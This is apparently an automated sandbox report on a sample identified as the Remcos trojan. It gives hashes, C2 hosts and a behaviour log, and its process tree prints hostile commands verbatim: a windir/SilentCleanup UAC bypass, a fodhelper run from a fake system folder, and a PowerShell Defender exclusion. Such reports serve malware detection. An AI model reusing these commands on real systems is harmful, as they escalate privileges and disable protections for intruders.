Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10_x64 -
resource
win10 -
submitted
10-07-2020 12:11
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe
-
Size
1.5MB
-
MD5
0c6a22a028ce02e10608bb44b7b4c66f
-
SHA1
686ca5b3fdb1606769054107783ab4ad49a3acec
-
SHA256
491cff43b259addd44a312094b15674d2c33c9ab901500130fead03e7d9d6530
-
SHA512
dbee8252a20e0e90242282b14c76ca8256700055b65f27f3b19131bd27613a5168363d4507daac641234504f15b3b6d4a53140b5c591e6df732aa253087ffaaa
Score
10/10
Malware Config
Extracted
Family
remcos
C2
karimgoussd.ug:6969
fgdjhksdfsdxcbv.ru:6969
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Adds Run entry to start application 2 TTPs 1 IoCs
Processes:
SecuriteInfo.com.Artemis0C6A22A028CE.16359.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ghsb = "C:\\Users\\Admin\\AppData\\Local\\Ghsb\\Ghsb.hta" SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
SecuriteInfo.com.Artemis0C6A22A028CE.16359.exedescription pid process target process PID 716 set thread context of 1844 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe ieinstal.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1584 powershell.exe Token: SeIncreaseQuotaPrivilege 1584 powershell.exe Token: SeSecurityPrivilege 1584 powershell.exe Token: SeTakeOwnershipPrivilege 1584 powershell.exe Token: SeLoadDriverPrivilege 1584 powershell.exe Token: SeSystemProfilePrivilege 1584 powershell.exe Token: SeSystemtimePrivilege 1584 powershell.exe Token: SeProfSingleProcessPrivilege 1584 powershell.exe Token: SeIncBasePriorityPrivilege 1584 powershell.exe Token: SeCreatePagefilePrivilege 1584 powershell.exe Token: SeBackupPrivilege 1584 powershell.exe Token: SeRestorePrivilege 1584 powershell.exe Token: SeShutdownPrivilege 1584 powershell.exe Token: SeDebugPrivilege 1584 powershell.exe Token: SeSystemEnvironmentPrivilege 1584 powershell.exe Token: SeRemoteShutdownPrivilege 1584 powershell.exe Token: SeUndockPrivilege 1584 powershell.exe Token: SeManageVolumePrivilege 1584 powershell.exe Token: 33 1584 powershell.exe Token: 34 1584 powershell.exe Token: 35 1584 powershell.exe Token: 36 1584 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Suspicious use of WriteProcessMemory 528 IoCs
Processes:
SecuriteInfo.com.Artemis0C6A22A028CE.16359.exedescription pid process target process PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe PID 716 wrote to memory of 3776 716 SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe TapiUnattend.exe -
Executes dropped EXE 1 IoCs
Processes:
fodhelper.exepid process 2684 fodhelper.exe -
Loads dropped DLL 1 IoCs
Processes:
fodhelper.exepid process 2684 fodhelper.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000_Classes\Local Settings cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Artemis0C6A22A028CE.16359.exe"1⤵
- Adds Run entry to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\SysWOW64\TapiUnattend.exe"C:\Windows\System32\TapiUnattend.exe"2⤵PID:3776
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat3⤵PID:1884
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f4⤵
- Modifies registry key
PID:988 -
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "4⤵
- Modifies registry key
PID:4080 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I4⤵PID:1900
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f4⤵
- Modifies registry key
PID:3848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\Runex.bat3⤵PID:2632
-
C:\Windows \System32\fodhelper.exe"C:\Windows \System32\fodhelper.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat5⤵PID:1660
-
C:\Windows\system32\cmd.execmd /c C:\Users\Public\x.vbs6⤵
- Modifies registry class
PID:1548 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"7⤵PID:1356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "8⤵PID:2008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local9⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"2⤵PID:1844